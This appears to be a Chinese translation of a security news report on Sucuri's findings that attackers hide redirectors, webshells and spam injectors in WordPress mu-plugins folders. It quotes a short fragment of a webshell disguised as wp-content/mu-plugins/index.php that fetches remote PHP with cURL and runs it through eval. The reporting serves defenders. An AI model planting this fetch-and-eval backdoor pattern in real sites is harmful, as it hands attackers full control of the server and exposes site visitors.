威胁行动者在WordPress网站中隐藏恶意软件以远程执行代码

阅读量24847

发布时间 : 2025-04-01 11:25:38

x
译文声明

本文是翻译文章,文章原作者 Tushar Subhra Dutta,文章来源:cybersecuritynews

原文地址:https://cybersecuritynews.com/threats-actors-hide-malware-in-wordpress-websites/

译文仅供参考,具体内容表达以及含义原文为准。

近期的一些发现揭示了一个令人担忧的趋势:威胁行为者正策略性地将恶意代码隐藏在 WordPress 网站的 mu-plugins目录中。

这个目录对攻击者来说特别有价值,因为它会随着 WordPress 自动加载,这使得恶意代码的检测和清除变得更加困难。

已发现的恶意软件变种采用了复杂的技术来保持其持续性,同时执行从用户重定向到完全接管网站等一系列有害功能。

这些攻击针对的是 mu-plugins文件夹,攻击者使用了多种看似合法但包含恶意代码的恶意软件类型。

其中包括将毫无防备的访客重定向到有害域名的重定向脚本、为攻击者提供远程代码执行能力的Webshell,以及操纵网站内容以分发不需要的材料的垃圾邮件注入器。

Sucuri 的研究人员检测到,这些恶意软件变种经过精心设计,通过让搜索引擎爬虫和特权用户无法看到其恶意行为来躲避检测。

他们的分析显示,攻击者正在使用越来越复杂的技术,以确保他们的恶意软件一直处于隐藏状态,同时最大限度地发挥其对目标网站的影响。

感染了这些恶意脚本的网站会面临多种后果,包括声誉受损、潜在的数据被盗、向访客传播恶意软件以及对网站进行未经授权的修改。

最具破坏性的变种使攻击者能够持续访问被攻陷的网站,为长期的恶意利用奠定了基础。

Webshell 分析:远程代码执行能力

已发现的最令人担忧的变种是一个伪装成合法 WordPress 插件文件的Webshell,它被放置在 “wp-content/mu-plugins/index.php” 位置。

这个Webshell包含旨在下载并执行远程 PHP 脚本的代码:

if (curl_errno($connectionHandle))

die(‘cURL error occurred: ‘. curl_error($connectionHandle));

}

curl_close($connectionHandle);

eval(“?>” . $retrievedCode);

这段代码片段展示了恶意软件如何使用 PHP 的 eval () 函数来执行从远程服务器获取的任意代码。

这种方法使攻击者能够以与 Web 服务器相同的权限运行命令,这有可能导致网站被完全攻陷。

一旦建立起这个后门,攻击者就能够上传文件、删除内容并访问敏感信息,将被攻陷的网站变成一个针对访客和连接系统发动进一步攻击的平台。

本文翻译自cybersecuritynews 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
安全客
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66